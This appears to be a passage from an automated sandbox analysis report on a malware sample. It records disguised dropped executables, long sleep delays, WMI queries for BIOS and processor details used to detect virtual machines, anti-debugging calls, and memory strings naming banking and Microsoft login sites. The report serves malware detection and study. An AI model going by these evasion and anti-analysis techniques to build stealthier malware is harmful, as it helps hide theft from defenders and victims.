                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\tRDbbuYG.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\MebxBNFC.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\DCGpXXhM.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\CEfhBXTR.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\fwOdVSPR.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\rxJbrpZI.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\GidQnkDb.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\NsJXliNz.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\HjZguhPI.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\wHtSiqYz.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\AtVzwBvZ.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\fneLqjpL.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\QURoIJFv.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\wDeIoEvg.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\KYTGugDU.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\zOoquaSY.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\FkBISkog.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\JkPyJTHW.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\HAgyIDIK.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\RbQwOwnn.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\YYEvrLib.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\HrJyYQpO.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\ksDciByC.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\VIjnlGUj.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\VWRNVcdg.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\ihttcfaK.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\BmbzgENi.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\NJzXBuON.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\lkWuMAXT.logJump to dropped file
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23634
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exe TID: 1520Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6464Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -599719s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -599328s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -598969s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -598453s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -598297s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -598153s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -597984s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -597703s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6784Thread sleep time: -18000000s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -596656s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -596406s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -595875s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -595469s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -595063s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -594844s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -594563s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -594188s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -593828s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -593313s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -592688s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -592391s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -592215s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -591953s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -591234s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -590734s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -590375s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -590016s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -589719s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -589297s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -588969s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -588616s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -588422s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -588121s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -587688s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -587341s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -587205s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -587078s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -586953s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -586844s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -586714s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -586609s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -586500s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6784Thread sleep time: -300000s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -586359s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -586213s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -585942s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -585813s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -585696s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -585578s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -585469s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -585359s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -585209s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -585078s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456Thread sleep time: -584969s >= -30000sJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0100A69B
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0102B348 FindFirstFileExA,0_2_0102B348
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0101C220
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101E6A3 VirtualQuery,GetSystemInfo,0_2_0101E6A3
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 599719Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 599328Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 598969Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 598453Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 598297Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 598153Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 597984Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 597703Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 596656Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 596406Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 595875Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 595469Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 595063Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 594844Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 594563Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 594188Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 593828Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 593313Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 592688Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 592391Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 592215Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 591953Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 591234Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 590734Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 590375Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 590016Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 589719Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 589297Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 588969Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 588616Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 588422Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 588121Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 587688Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 587341Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 587205Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 587078Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586953Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586844Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586714Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586609Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586500Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586359Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586213Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585942Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585813Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585696Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585578Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585469Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585359Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585209Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585078Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 584969Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: 0utajUt79J.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                    Source: 9FwQYJSj4N.exe, 00000000.00000003.2086069801.0000000000551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
                                    Source: 0utajUt79J.12.drBinary or memory string: discord.comVMware20,11696428655f
                                    Source: 0utajUt79J.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                    Source: 0utajUt79J.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                    Source: 0utajUt79J.12.drBinary or memory string: global block list test formVMware20,11696428655
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3386421486.000000001C031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,116964286o
                                    Source: 0utajUt79J.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                    Source: wscript.exe, 00000002.00000002.2131801326.0000000002DCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: 0utajUt79J.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3389041116.000000001C3D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                                    Source: 0utajUt79J.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                    Source: 0utajUt79J.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                    Source: 0utajUt79J.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                    Source: 0utajUt79J.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3386421486.000000001C031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.co.inVMware20,11696428655~
                                    Source: 0utajUt79J.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                    Source: 0utajUt79J.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                    Source: 0utajUt79J.12.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                                    Source: 0utajUt79J.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                    Source: 0utajUt79J.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                    Source: 0utajUt79J.12.drBinary or memory string: outlook.office.comVMware20,11696428655s
                                    Source: 0utajUt79J.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                    Source: 0utajUt79J.12.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                    Source: 0utajUt79J.12.drBinary or memory string: AMC password management pageVMware20,11696428655
                                    Source: 0utajUt79J.12.drBinary or memory string: tasks.office.comVMware20,11696428655o
                                    Source: wscript.exe, 00000002.00000003.2131139508.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: 0utajUt79J.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                    Source: 0utajUt79J.12.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                                    Source: 0utajUt79J.12.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                                    Source: 0utajUt79J.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                    Source: 0utajUt79J.12.drBinary or memory string: dev.azure.comVMware20,11696428655j
                                    Source: 9FwQYJSj4N.exe, BSlvAOjamepaXWJMhY.exe0.5.dr, spoolsv.exe.5.dr, BSlvAOjamepaXWJMhY.exe.5.dr, ApplicationFrameHost.exe.5.dr, BSlvAOjamepaXWJMhY.exe1.5.drBinary or memory string: qEmuPae9hmh
                                    Source: 0utajUt79J.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                    Source: 0utajUt79J.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                    Source: 0utajUt79J.12.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                                    Source: 0utajUt79J.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                    Source: 0utajUt79J.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeAPI call chain: ExitProcess graph end nodegraph_0-23784
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF84904340F rdtsc 5_2_00007FF84904340F
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0101F838
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_01027DEE mov eax, dword ptr fs:[00000030h]0_2_01027DEE
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0102C030 GetProcessHeap,0_2_0102C030
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101F9D5 SetUnhandledExceptionFilter,0_2_0101F9D5
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0101F838
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0101FBCA
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_01028EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01028EBD
